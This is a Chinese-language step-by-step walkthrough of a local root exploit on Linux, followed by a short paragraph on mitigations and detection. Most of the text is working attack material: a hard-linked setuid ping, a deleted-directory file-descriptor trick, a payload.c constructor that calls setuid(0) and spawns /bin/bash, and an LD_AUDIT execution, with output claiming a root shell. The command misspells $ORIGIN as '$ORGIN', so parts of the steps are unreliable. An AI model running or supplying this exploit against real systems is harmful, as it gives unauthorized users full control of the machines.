以 root 身份添加一个 testuser1 帐户,
并为其设置密码
su testuser1
cd ~
mkdir -p /tmp/ex1
ln /bin/ping /tmp/ex1/target
exec 3< /tmp/ex1/target
rm -rf /tmp/ex1
再执行
ls -l /proc/$$/fd/3
显示
lr-x------ 1 testuser1 testuser1 64 Dec 28 11:48 /proc/21958/fd/3 -> /tmp/ex1/target (deleted)
cd ~
[testuser1@mail ~]$ vi payload.c
内容
/*
 * Shared-object constructor. The constructor attribute makes init() run
 * automatically when this library is loaded; nothing has to call it.
 * Takes no arguments and returns nothing.
 *
 * No headers are included, so setuid() and system() are implicitly
 * declared; the build command on this page passes -w, which silences the
 * resulting compiler warnings.
 */
void __attribute__((constructor)) init()
{
/* Ask for UID 0. The return value is ignored, so the next statement runs
   whether or not the call succeeded.
   NOTE(review): this can only succeed when the process loading the library
   is already privileged (e.g. a setuid-root program) - confirm in context. */
setuid(0);
/* Start /bin/bash through system(); the shell is a child of the process
   that loaded this library. */
system("/bin/bash");
}
执行
gcc -w -fPIC -shared -o /tmp/ex1 payload.c
而后看一下
[testuser1@mail ~]$ ls -al /tmp/ex1
-rwxrwxr-x 1 testuser1 testuser1 4223 Dec 28 11:50 /tmp/ex1
执行
[testuser1@mail ~]$ LD_AUDIT="$ORGIN" exec /proc/self/fd/3
结果是:
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
#
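[root@mail]$提权成功。
说明:上述过程依赖两个条件。其一,普通用户能够在自己可写的目录(此处为 /tmp)中为 /bin/ping 创建硬链接(该程序在此类系统上通常带有 setuid 位,且硬链接要求两者位于同一文件系统);其二,动态链接器在加载该特权程序时仍然处理了用户提供的 LD_AUDIT 环境变量,从而加载了用户可控的共享库并执行其中的构造函数。防护措施:将 glibc 升级到已修复的版本;启用 fs.protected_hardlinks,或把 /tmp 等用户可写目录放到独立的、以 nosuid 挂载的文件系统上,使普通用户无法硬链接 setuid 文件。排查时可关注以下迹象:文件描述符指向已删除(deleted)的 setuid 程序的进程,以及执行特权程序时环境中带有 LD_AUDIT 的情况。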